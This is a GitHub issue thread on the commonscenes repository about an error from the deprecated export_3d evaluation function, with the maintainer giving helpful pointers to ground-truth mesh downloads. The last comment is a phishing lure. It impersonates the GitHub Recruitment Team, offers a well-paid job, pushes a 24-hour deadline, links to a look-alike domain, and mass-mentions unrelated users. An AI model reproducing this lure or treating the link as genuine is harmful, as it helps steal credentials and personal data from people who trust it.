### ISSUE TITLE
eval

### ISSUE THREAD

**Issue by weiyao1996** [ymxlzgy/commonscenes#5]
For MMD/COV/1-NN, I tried to store object by object in the generated scenes, which can be done in eval_3dfront.py, as mentioned in README. However, when running eval_3dfront.py by canceling the comment on [export_3d](https://github.com/ymxlzgy/commonscenes/blob/main/scripts/eval_3dfront.py#L532), I came across an error shown below.

"in validate_constrains_loop
shapes_pred_exp = shape_enc_pred.detach().cpu().numpy().tolist()
UnboundLocalError: local variable 'shape_enc_pred' referenced before assignment"

Hence, I was wondering if the implementation of export_3d is completed. If not, could you please give me some suggestions on fixing this issue?

Best,
Yao

**Comment by ymxlzgy** [comment]
> For MMD/COV/1-NN, I tried to store object by object in the generated scenes, which can be done in eval_3dfront.py, as mentioned in README. However, when running eval_3dfront.py by canceling the comment on [export_3d](https://github.com/ymxlzgy/commonscenes/blob/main/scripts/eval_3dfront.py#L532), I came across an error shown below.
> 
> "in validate_constrains_loop shapes_pred_exp = shape_enc_pred.detach().cpu().numpy().tolist() UnboundLocalError: local variable 'shape_enc_pred' referenced before assignment"
> 
> Hence, I was wondering if the implementation of export_3d is completed. If not, could you please give me some suggestions on fixing this issue?
> 
> Best, Yao

Hi,
Sorry for that confusion, but `export_3d` is an old function in Graph_to_3D, and it is deprecated. We use the other ways from inside the body of func [render_v2_full](https://github.com/ymxlzgy/commonscenes/blob/0eab9f1cbb6bd5da3a2e56e8c87b54d9918d7e52/scripts/eval_3dfront.py#L574), such as [here](https://github.com/ymxlzgy/commonscenes/blob/0eab9f1cbb6bd5da3a2e56e8c87b54d9918d7e52/helpers/visualize_scene.py#L443) to store the scenes. I definitely will clean up the code a bit after the next deadline.

**Comment by weiyao1996** [comment]
Many thanks for your reply and help! No worry, take your time. 

Cheers,
Yao

**Comment by weiyao1996** [comment]
May I ask two more questions? Sorry to bother you.
1. How to collect ground truths for compute_mmd_cov_1nn.py? Could you please share the files under the folder "/media/storage/guangyao/g2s_test/gt_fov90_h8_obj_meshes/test/small"?
2. How to visualize the scene graphs with visualize_graph.py? Could you please give an example?

Thanks a lot for your help and patience!

**Comment by weiyao1996** [comment]
May I ask two more questions? Sorry to bother you.
1. How to collect ground truths for compute_mmd_cov_1nn.py? Could you please share the files under the folder "/media/storage/guangyao/g2s_test/gt_fov90_h8_obj_meshes/test/small"?
2. How to visualize the scene graphs with visualize_graph.py? Could you please give an example?
Thanks a lot for your help and patience!

**Comment by ymxlzgy** [comment]
> May I ask two more questions? Sorry to bother you.
> 
> 1. How to collect ground truths for compute_mmd_cov_1nn.py? Could you please share the files under the folder "/media/storage/guangyao/g2s_test/gt_fov90_h8_obj_meshes/test/small"?
> 2. How to visualize the scene graphs with visualize_graph.py? Could you please give an example?
>    Thanks a lot for your help and patience!

Hi, Thanks for letting me know the problem. You can download meshes [here](https://www.campar.in.tum.de/public_datasets/2023_commonscenes_zhai/gt_fov90_h8_obj_meshes.zip) (~5G). If you don't want to wait, you can also generate them by yourself, using [this file](https://www.campar.in.tum.de/public_datasets/2023_commonscenes_zhai/collect_object_imgs.py). But you need to modify the paths inside. Good luck! 
Update: For your second question, from what I remember, that file needs python3.7. You can see some usage cases in Graph-to-3D.

**Comment by yannvr** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
J1ufan, @Liujialei, @ekelen, @chillmanAU, @fanjingang, @myfix16, @LittleCat01, @nitemud, @rwaal, @oyrm, @softbeast, @Souf1an3, @mcc9, @Noircoda, @z415073783, @smithikakart, @jfklg, @shawn888, @reeshabhranjan, @jmatrix
